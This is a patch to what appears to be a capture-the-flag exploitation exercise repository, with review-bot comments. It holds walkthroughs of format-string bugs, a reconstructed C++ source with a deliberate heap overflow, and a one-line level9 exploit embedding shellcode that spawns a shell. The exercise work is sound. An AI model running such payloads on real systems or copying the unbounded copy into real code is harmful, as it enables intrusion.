diff --git a/level3/walkthrough b/level3/walkthrough index 8195a06..c9f36ff 100644 --- a/level3/walkthrough +++ b/level3/walkthrough @@ -1,7 +1,7 @@ # Level3 -Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. -This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`. +This buffer will then be passed directly as a parameter to `printf()`. This allows us to print whatever we want (e.g dump the stack, change variables). We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`. Our goal here will be to change the value of this variable in order to get the password. diff --git a/level4/walkthrough b/level4/walkthrough index c0ec80e..35647f6 100644 --- a/level4/walkthrough +++ b/level4/walkthrough @@ -1,6 +1,6 @@ # Level4 -Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`. This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`. Our goal here will be to change the value of this variable in order to get the password. diff --git a/level7/source.c b/level7/source.c index 6849131..72a1f64 100644 --- a/level7/source.c +++ b/level7/source.c @@ -9,7 +9,7 @@ void m(void) { time_t current_time; - current_time = time((time_t *)0x0); + current_time = time(NULL); printf("%s - %d\n", c, current_time); return; } 
diff --git a/level9/ressources/exploit b/level9/ressources/exploit new file mode 100644 index 0000000..bbf9ec4 --- /dev/null +++ b/level9/ressources/exploit @@ -0,0 +1 @@ +./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"') diff --git a/level9/source.cpp b/level9/source.cpp new file mode 100644 index 0000000..b8b81c4 --- /dev/null +++ b/level9/source.cpp @@ -0,0 +1,44 @@ +#include +#include + +class N +{ + public: + char annotation[100]; + int nb; + + N(int Nb) + { + nb = Nb; + } + + void setAnnotation(char *str) + { + memcpy(annotation, str, strlen(str)); + } + + int operator+(N const &e) + { + return nb + e.nb; + } + + int operator-(N const &e) + { + return nb - e.nb; + } +}; + +int main(int ac, char **av) +{ + if (ac <= 1) + exit(1); + + N *a = new N(5); + N *b = new N(6); + + N *a_ptr = a; + N *b_ptr = b; + a_ptr->setAnnotation(av[1]); + + return *b_ptr + *a_ptr; +}
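Review bot: the `fgets()`/`printf()` parenthesisation in the level3 walkthrough hunk is fine, but the sentence still does not say why passing the buffer straight to `printf()` is the bug: the user's input becomes the format string, so `printf(buffer)` interprets any format directives it contains, whereas `printf("%s", buffer)` would print it as plain data. Adding that one clause would make the walkthrough explain the vulnerability rather than only assert it; while there, write `e.g.` with both periods.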
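Review bot: inconsistency in the level4 walkthrough hunk: `fgets` gains `()` but `printf` on the following context line is left bare, while the level3 hunk in the same patch changes both. Either change `printf` here as well or drop the level3 change, so the two walkthroughs follow one convention; the same `e.g` typo is repeated on that context line.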
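Review bot: replacing `(time_t *)0x0` with `NULL` in the level7 hunk is clearer, but the context line `printf("%s - %d\n", c, current_time);` still passes a `time_t` to `%d`, which is undefined behaviour and prints the wrong value wherever `time_t` is wider than `int`. Since the line is being touched, cast explicitly, e.g. `printf("%s - %ld\n", c, (long)current_time);`. `NULL` also needs a header that defines it (`<time.h>` or `<stdio.h>`); the hunk context does not show the includes, so confirm one is present.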
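Review bot: missing documentation in the new `level9/ressources/exploit` file: it is a bare one-liner with no comment explaining what the two 4-byte little-endian addresses, the hex byte string and the `"A"*79` padding correspond to, and unlike levels 3, 4 and 7 there is no `level9/walkthrough` in this patch to describe the bug it targets. The `python -c 'print "..."'` form is Python 2 syntax, which should be stated, since under Python 3 the `print` statement is a syntax error. The directory name `ressources` also looks like a typo for `resources`.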
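Review bot: the new `level9/source.cpp` will not compile as committed: both `#include` directives name no header, so `memcpy`/`strlen` (`<cstring>`) and `exit` (`<cstdlib>`) are undeclared; check whether the header names were lost when the file was added. Separately, `setAnnotation()` does `memcpy(annotation, str, strlen(str))` with no bound on the 100-byte `annotation` array and never NUL-terminates it; if this is the challenge's intended overflow, a comment saying so would stop a later contributor from "fixing" it, and the hardened reference form would be a bounded copy such as `snprintf(annotation, sizeof annotation, "%s", str);`. Minor: `a` and `b` are allocated with `new` and never deleted, and `main()` returns `*b_ptr + *a_ptr`, i.e. the sum of the two `nb` fields, as the process exit status.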